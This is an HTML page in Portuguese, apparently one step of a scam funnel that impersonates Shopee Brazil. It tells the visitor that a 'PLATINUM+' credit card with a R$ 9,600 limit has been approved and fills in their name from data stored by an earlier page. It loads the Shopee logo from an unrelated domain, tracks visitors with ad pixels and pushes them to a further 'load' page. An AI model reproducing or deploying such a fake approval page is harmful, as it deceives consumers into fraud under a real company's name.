﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Aprovado</title>
    <link href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" rel="stylesheet">










    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->













    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            text-align: center;
            padding: 2rem;
            border-radius: 12px;
            margin: 30px auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .success-title {
            color: #1F2937;
            font-size: 1.5rem;
            margin-bottom: 0.5rem;
        }

        .limit-value {
            color: #EE4D2D;
            font-size: 1.5rem;
            font-weight: 700;
            margin-bottom: 1.5rem;
        }

        .card-credit {
            background: linear-gradient(135deg, #EE4D2D, #FF6B4B);
            border-radius: 16px;
            padding: 24px;
            color: #ffffff;
            box-shadow: 0 10px 20px rgba(238, 77, 45, 0.2);
            position: relative;
            height: 200px;
            max-width: 350px;
            margin: 0 auto;
        }

        .card-details {
            position: relative;
            height: 100%;
        }

        .bank-name {
            font-size: 20px;
            font-weight: 600;
            text-align: left;
            
        }

        .platinum {
            position: absolute;
            top: 2px;
            right: 20px;
            color: #ffffff;
            text-transform: uppercase;
            font-size: 0.875rem;
            letter-spacing: 0.05em;
        }

        .chip {
            position: absolute;
            top: 50px;
            left: 0;
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .name-info {
            position: absolute;
            bottom: 10px;
            left: 0;
            font-size: 16px;
            font-weight: 500;
            color: #ffffff;
            text-transform: uppercase;
        }

        .card-info {
            margin: 1.5rem 0;
        }

        .card-type {
            font-weight: 700;
            color: #1F2937;
            margin-bottom: 0.5rem;
        }

        .benefits-list {
            list-style: none;
            padding-left: 0;
            margin: 1.5rem 0;
            text-align: left;
        }

        .benefits-list li {
            display: flex;
            align-items: center;
            gap: 0.75rem;
            margin-bottom: 1rem;
            color: #4B5563;
            font-size: 0.9375rem;
        }

        .benefits-list i {
            color: #EE4D2D;
            font-size: 1.25rem;
            flex-shrink: 0;
        }

        .btn-custom {
            color: #ffffff;
            border: none;
            width: 100%;
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            font-weight: 500;
            border-radius: 8px;
            padding: 1rem 2rem;
            font-size: 1rem;
            cursor: pointer;
            transition: all 0.3s ease;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            padding: 2rem 1rem;
            border-bottom: solid 3px #EE4D2D;
            margin-top: 3rem;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 1.5rem;
            }

            .card-credit {
                max-width: 300px;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <h4 class="success-title">Solicitação concluída com sucesso!</h4>
            <h4 class="limit-value">Limite: R$ 9.600,00</h4>
            
            <div class="card-credit">
                <div class="card-details">
                    <div class="bank-name">shopee</div>
                    <div class="platinum">platinum+</div>
                    <div class="chip mt-3">
                        <img src="../../128/9334/9334627.png" alt="Chip do cartão" class="chip-img" style="width: 30px;">
                        <img src="../../show/369926/connection-nfc.svg" alt="NFC" style="width: 20px;">
                    </div>
                    <div class="name-info" id="nomeCartao"></div>
                    <div class="mastercard" style="position: absolute; bottom: 20px; right: 20px; width: 50px;">
                        <img src="../../8b1cc0c7-5e15-4589-8ee6-efa6016a75ce/8b1cc0c7-5e15-4589-8ee6-efa6016a75ce.png" alt="Mastercard Logo" style="width: 100%;">
                    </div>
                </div>
            </div>

            <div class="card-info">
                <p class="card-type">Conheça o novo cartão PLATINUM+</p>
                <p>Além do crédito liberado, você terá esses benefícios:</p>
            </div>

            <ul class="benefits-list">
                <li><i class="ri-check-double-line"></i>Desconto em eventos e shows</li>
                <li><i class="ri-check-double-line"></i>Cashback de até 5% em compras online</li>
                <li><i class="ri-check-double-line"></i>Descontos de até 15% em farmácias parceiras</li>
                <li><i class="ri-check-double-line"></i>Descontos em lojas parceiras</li>
                <li><i class="ri-check-double-line"></i>Acesso a salas VIP em aeroportos</li>
                <li><i class="ri-check-double-line"></i>Descontos de até 15% em voos com acesso ao Lounge VIP</li>
            </ul>

            <button type="button" onclick="location.href='../load/index.php.html'" class="btn btn-custom">
                Continuar
            </button>
        </div>
    </div>

    <div class="footer">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        const dadosUsuario = JSON.parse(localStorage.getItem('dadosUsuarioUni'));
        if (dadosUsuario && dadosUsuario.nome) {
            const nomeCompleto = dadosUsuario.nome.split(' ');
            const primeiroNome = nomeCompleto[0];
            const ultimoNome = nomeCompleto[nomeCompleto.length - 1];
            const nomeParaMostrar = `${primeiroNome} ${ultimoNome}`;
            document.getElementById('nomeCartao').textContent = nomeParaMostrar;
        } else {
            console.error('Nome do usuário não encontrado no localStorage.');
        }
    });
</script>


</body>
</html>